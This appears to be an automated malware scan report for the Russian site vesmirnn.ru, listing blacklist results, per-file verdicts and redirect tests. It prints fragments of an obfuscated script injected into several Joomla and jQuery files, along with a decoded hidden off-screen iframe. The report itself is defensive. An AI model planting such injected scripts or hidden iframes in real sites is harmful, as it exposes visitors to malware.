Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vesmirnn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vesmirnn.ru/
Result: The website is marked by Yandex as suspicious — visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious — visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.vesmirnn.ru/ | 200 OK Content-Length: 26595 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 645x320 style: hidden src: http://ui.sletat.ru/hotresult.html?sfx=_gtnny&fbg=ffffff&mbg=ffffff&bbg=ffffff&bbd=eeeeee&cbd=abadb3&c1=222222&c2=838383&c3=9d1414&c4=dac6a1&style=.full.country%20span%23main%7bfont-weight%3a%20normal%20!important%3b%7d.full.country%20span%23main%7bfont-style%3a%20italic%20!important%3b%7d¤cy=rub&rc=5&stpl=%d0%93%d0%be%d1%80%d1%8f%d1%89%d0%b8%d0%b5%20%d1%82%d1%83%d1%80%d1%8b%20(%d0%9d%d0%b8%d0%b6%d0%bd%d0%b8%d0%b9%20%d0%9d%d0%be%d0%b2%d0%b3%d0%be%d1%80%d0%be%d0%b4)&settings={ <iframe allowtransparency="true" onload="sm2_sly_gtnny.init()" id="sm2_slyresult_gtnny" src="http://ui.sletat.ru/hotresult.html?sfx=_gtnny&fbg=ffffff&mbg=ffffff&bbg=ffffff&bbd=eeeeee&cbd=abadb3&c1=222222&c2=838383&c3=9d1414&c4=dac6a1&style=.full.country%20span%23main%7bfont-weight%3a%20normal%20!important%3b%7d.full.country%20span%23main%7bfont-style%3a%20italic%20!important%3b%7d¤cy=rub&rc=5&stpl=%d0%93%d0%be%d1%80%d1%8f%d1%89%d0%b8%d0%b5%20%d1%82%d1%83%d1%80%d1%8b%20(%d0%9d%d0%b8%d0%b6%d0%bd%d0%b8%d0%b9%20%d0%9d%d0%be%d0%b2%d0%b3%d0%be%d1%80%d0%be%d0%b4)&settings={'plugins':[]}" height="320" width="645" frameborder="0" style="display:none" scrolling="no"> | ||
http://www.vesmirnn.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97755 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lumpaZO = false; for (var i in nonList) { return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})(); Antivirus reports:
| ||
http://www.vesmirnn.ru/media/system/js/core.js | 200 OK Content-Length: 6177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lumpaZO = false; for (var i in nonList) { function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)}; Antivirus reports:
| ||
http://www.vesmirnn.ru/media/system/js/caption.js | 200 OK Content-Length: 2123 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lump ...[1750 bytes skipped]... Decoded script: <iframe src=http://google.com style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://www.vesmirnn.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 239724 Content-Type: application/javascript | clean |
http://www.vesmirnn.ru/templates/hot_sailing/js/jquery/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://www.vesmirnn.ru/templates/hot_sailing/js/jquery/jquery-ui.min.js | 200 OK Content-Length: 210902 Content-Type: application/javascript | clean |
http://www.vesmirnn.ru/templates/hot_sailing/js/jquery.hjt.nav.js | 200 OK Content-Length: 2358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lumpaZO = false; for (var i in nonList) { jQuery('ul.mnu_topmenu > li').hover(function(){ jQuery(this).has('ul').addClass('topradiusonly'); }); jQuery('.menu.nav li').hover(function(){ jQuery(this).find('ul:first').stop(true,true)[options.effect](options.speed); },function(){ jQuery(this).css('position', 'relative') .find('ul:first').stop(true,true)[options.effect](options.speed); }); }); }; })(jQuery); Antivirus reports:
| ||
http://ui.sletat.ru/client/linker_hot.js?settings={formViewMode:'block'}&sfx=_GtNnY | 200 OK Content-Length: 24635 Content-Type: text/javascript | clean |
http://www.vesmirnn.ru//yandex.st/share/share.js/ | HTTP/1.1 404 Not Found Connection: close Date: Sun, 21 Sep 2014 07:34:37 GMT Server: nginx/1.6.0 Content-Length: 155 Content-Type: text/html; charset=iso-8859-1 | clean |
http://handler.hostland.ru/404.html?errorurl= | 200 OK Content-Length: 10803 Content-Type: text/html | clean |
http://handler.hostland.ru/test404page.js | 200 OK Content-Length: 504 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vesmirnn.ru
Result:
GET / HTTP/1.1
Host: vesmirnn.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vesmirnn.ru
Referer: http://www.google.com/search?q=vesmirnn.ru
Result:
The result is similar to that of the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: vesmirnn.ru
Referer: http://www.google.com/search?q=vesmirnn.ru
Result:
The result is similar to that of the first query. No suspicious redirects were found.